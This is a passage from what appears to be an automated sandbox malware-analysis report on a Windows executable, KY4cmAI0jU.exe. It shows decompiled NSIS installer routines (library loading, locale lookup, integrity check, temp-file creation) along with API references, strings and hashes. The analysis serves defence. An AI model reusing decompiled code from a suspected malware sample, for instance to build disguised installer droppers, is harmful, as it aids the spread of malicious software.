                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                        • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                        • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                        • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                        0x00405e90
                                                                                                        0x00405e93
                                                                                                        0x00405e9a
                                                                                                        0x00405ea2
                                                                                                        0x00405eaf
                                                                                                        0x00000000
                                                                                                        0x00405eb6
                                                                                                        0x00405ea5
                                                                                                        0x00405ead
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405ebe

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 310444273-0
                                                                                                        • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                        • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                        • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                        • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                        0x00405e6c
                                                                                                        0x00405e75
                                                                                                        0x00000000
                                                                                                        0x00405e82
                                                                                                        0x00405e78
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNELBASE(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 00405E6C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 2295610775-0
                                                                                                        • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                        • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                        • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                        • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					"1033" = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AC4("1033",  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				_t85 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040573A(_t96, _t85) == 0) {
						E00405B88(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(_t85, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                        0x004036b5
                                                                                                        0x004036be
                                                                                                        0x004036c5
                                                                                                        0x004036c7
                                                                                                        0x004036db
                                                                                                        0x004036ed
                                                                                                        0x004036f7
                                                                                                        0x004036fc
                                                                                                        0x00403702
                                                                                                        0x00403715
                                                                                                        0x00403715
                                                                                                        0x00403720
                                                                                                        0x004036c9
                                                                                                        0x004036d4
                                                                                                        0x004036d4
                                                                                                        0x00403725
                                                                                                        0x0040372f
                                                                                                        0x00403738
                                                                                                        0x0040373d
                                                                                                        0x0040374e
                                                                                                        0x004037d5
                                                                                                        0x004037dd
                                                                                                        0x004037e6
                                                                                                        0x004037e6
                                                                                                        0x004037fc
                                                                                                        0x00403802
                                                                                                        0x00403810
                                                                                                        0x0040389f
                                                                                                        0x004038a7
                                                                                                        0x004038b1
                                                                                                        0x004038b6
                                                                                                        0x004038bc
                                                                                                        0x00403946
                                                                                                        0x0040394b
                                                                                                        0x0040394d
                                                                                                        0x00403969
                                                                                                        0x00000000
                                                                                                        0x00403969
                                                                                                        0x0040394f
                                                                                                        0x00403955
                                                                                                        0x0040395d
                                                                                                        0x0040395d
                                                                                                        0x00000000
                                                                                                        0x00403955
                                                                                                        0x004038ca
                                                                                                        0x004038db
                                                                                                        0x004038dd
                                                                                                        0x004038df
                                                                                                        0x004038e6
                                                                                                        0x004038e6
                                                                                                        0x004038ee
                                                                                                        0x004038f6
                                                                                                        0x004038f8
                                                                                                        0x004038fa
                                                                                                        0x00403903
                                                                                                        0x00403906
                                                                                                        0x0040390c
                                                                                                        0x0040390c
                                                                                                        0x0040392b
                                                                                                        0x0040393c
                                                                                                        0x00000000
                                                                                                        0x00403941
                                                                                                        0x004038a9
                                                                                                        0x004038ab
                                                                                                        0x00000000
                                                                                                        0x00403816
                                                                                                        0x00403816
                                                                                                        0x0040381c
                                                                                                        0x00403826
                                                                                                        0x0040382e
                                                                                                        0x00403838
                                                                                                        0x0040383e
                                                                                                        0x0040384c
                                                                                                        0x0040396e
                                                                                                        0x0040396e
                                                                                                        0x00000000
                                                                                                        0x0040396e
                                                                                                        0x00403852
                                                                                                        0x0040385b
                                                                                                        0x0040389a
                                                                                                        0x00000000
                                                                                                        0x0040389a
                                                                                                        0x00403754
                                                                                                        0x00403754
                                                                                                        0x00403759
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403763
                                                                                                        0x00403773
                                                                                                        0x00403778
                                                                                                        0x0040377f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403783
                                                                                                        0x00403785
                                                                                                        0x00403792
                                                                                                        0x00403792
                                                                                                        0x0040379a
                                                                                                        0x004037a0
                                                                                                        0x004037c8
                                                                                                        0x004037d0
                                                                                                        0x00000000
                                                                                                        0x004037b2
                                                                                                        0x004037b3
                                                                                                        0x004037bc
                                                                                                        0x004037c2
                                                                                                        0x004037c3
                                                                                                        0x00000000
                                                                                                        0x004037c3
                                                                                                        0x004037be
                                                                                                        0x004037c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004037c0
                                                                                                        0x004037a0

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • lstrcatA.KERNEL32(1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403720
                                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ), ref: 00403795
                                                                                                        • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 004037B3
                                                                                                        • LoadImageA.USER32 ref: 004037FC
                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                        • RegisterClassA.USER32 ref: 00403843
                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                        • CreateWindowExA.USER32 ref: 00403894
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                        • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                        • GetClassInfoA.USER32 ref: 004038F6
                                                                                                        • GetClassInfoA.USER32 ref: 00403903
                                                                                                        • RegisterClassA.USER32 ref: 0040390C
                                                                                                        • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                        • API String ID: 914957316-1494736033
                                                                                                        • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                        • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                        • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                        • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				long _t82;
				void* _t83;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				signed int _t103;
				void* _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe", 0x400);
				_t105 = E0040583D("C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\KY4cmAI0jU.exe");
				E00405B66(0x42b000, E004056A0("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405F62(0x40afb8);
						E0040586C( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								_t71 =  *0x417044; // 0x3fb94
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031BF(0x417050, _t106); // executed
						if(_t83 == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							_t103 =  *0x417040; // 0x8000
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 = _t103;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}






























                                                                                                        0x00402c80
                                                                                                        0x00402c83
                                                                                                        0x00402c9d
                                                                                                        0x00402ca2
                                                                                                        0x00402cb5
                                                                                                        0x00402cba
                                                                                                        0x00402cc0
                                                                                                        0x00000000
                                                                                                        0x00402cc2
                                                                                                        0x00402cd3
                                                                                                        0x00402ce4
                                                                                                        0x00402ceb
                                                                                                        0x00402cf3
                                                                                                        0x00402cf8
                                                                                                        0x00402cfa
                                                                                                        0x00402dea
                                                                                                        0x00402dec
                                                                                                        0x00402df8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402e01
                                                                                                        0x00402e2d
                                                                                                        0x00402e32
                                                                                                        0x00402e3d
                                                                                                        0x00402e3f
                                                                                                        0x00402e50
                                                                                                        0x00402e6b
                                                                                                        0x00402e74
                                                                                                        0x00402e79
                                                                                                        0x00402e98
                                                                                                        0x00402ea8
                                                                                                        0x00402eba
                                                                                                        0x00402ebf
                                                                                                        0x00402ec7
                                                                                                        0x00402ed4
                                                                                                        0x00402edc
                                                                                                        0x00402ee1
                                                                                                        0x00402ee3
                                                                                                        0x00402ee3
                                                                                                        0x00402eeb
                                                                                                        0x00402eeb
                                                                                                        0x00402eee
                                                                                                        0x00402eef
                                                                                                        0x00402eef
                                                                                                        0x00402ef2
                                                                                                        0x00402ef4
                                                                                                        0x00402ef4
                                                                                                        0x00402ef7
                                                                                                        0x00402efe
                                                                                                        0x00402f0a
                                                                                                        0x00000000
                                                                                                        0x00402f0f
                                                                                                        0x00000000
                                                                                                        0x00402ec7
                                                                                                        0x00000000
                                                                                                        0x00402e7b
                                                                                                        0x00402e09
                                                                                                        0x00402e1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d00
                                                                                                        0x00402d00
                                                                                                        0x00402d05
                                                                                                        0x00402d09
                                                                                                        0x00402d10
                                                                                                        0x00402d17
                                                                                                        0x00402d19
                                                                                                        0x00402d19
                                                                                                        0x00402d21
                                                                                                        0x00402d28
                                                                                                        0x00402e87
                                                                                                        0x00402ec9
                                                                                                        0x00000000
                                                                                                        0x00402ec9
                                                                                                        0x00402d34
                                                                                                        0x00402db8
                                                                                                        0x00402dbb
                                                                                                        0x00402dc0
                                                                                                        0x00000000
                                                                                                        0x00402db8
                                                                                                        0x00402d41
                                                                                                        0x00402d46
                                                                                                        0x00402d4e
                                                                                                        0x00402d74
                                                                                                        0x00402d7a
                                                                                                        0x00402d83
                                                                                                        0x00402d89
                                                                                                        0x00402d8e
                                                                                                        0x00402d94
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d9e
                                                                                                        0x00402da6
                                                                                                        0x00402da9
                                                                                                        0x00402dae
                                                                                                        0x00402db0
                                                                                                        0x00402db0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402d9e
                                                                                                        0x00402dc1
                                                                                                        0x00402dc7
                                                                                                        0x00402dd7
                                                                                                        0x00402dd7
                                                                                                        0x00402dda
                                                                                                        0x00402de0
                                                                                                        0x00402de2
                                                                                                        0x00000000
                                                                                                        0x00402d00

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\KY4cmAI0jU.exe,00000400), ref: 00402CA2
                                                                                                          • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\KY4cmAI0jU.exe,80000000,00000003), ref: 00405841
                                                                                                          • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KY4cmAI0jU.exe,C:\Users\user\Desktop\KY4cmAI0jU.exe,80000000,00000003), ref: 00402CEB
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                                        Strings
                                                                                                        • C:\Users\user\Desktop\KY4cmAI0jU.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                        • soft, xrefs: 00402D62
                                                                                                        • Error launching installer, xrefs: 00402CC2
                                                                                                        • "C:\Users\user\Desktop\KY4cmAI0jU.exe" , xrefs: 00402C7F
                                                                                                        • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                        • Null, xrefs: 00402D6B
                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                        • Inst, xrefs: 00402D59
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KY4cmAI0jU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                        • API String ID: 2803837635-596242704
                                                                                                        • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                        • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                        • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                        • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
